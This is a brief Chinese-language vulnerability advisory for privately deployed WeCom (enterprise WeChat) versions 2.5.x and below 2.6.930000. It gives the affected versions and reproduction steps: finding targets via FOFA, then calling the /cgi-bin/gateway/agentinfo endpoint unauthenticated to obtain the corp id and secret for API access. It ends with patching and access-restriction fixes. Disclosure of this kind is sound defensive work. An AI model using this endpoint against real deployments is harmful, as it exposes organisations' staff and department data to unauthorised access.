目录

影响版本

复现过程

修复方式

---

影响版本

影响私有化部署：
toB toG版微信 2.5.x 版本

2.6.930000 版本以下

危险程度：高危。攻击者可以进行获取企业的部门信息，员工信息，如权限较高包括应用获取，记录文件等等均可查看。

复现过程

fofa收集信息：

 利用：http://mydomain/cgi-bin/gateway/agentinfo，可以直接未授权获取到id和secret。

 企业微信开发者文档：

可拼接获取企业微信接口IP：https://qyapi.weixin.qq.com/cgi-bin/get_api_domain_ip?access_token=ACCESS_TOKEN

修复方式

 1. 联系企业微信官方获取补丁修复

 2. 限制 /cgi-bin/gateway/agentinfo 接口访问

3.  修改返回值信息，对文件加黑名单限制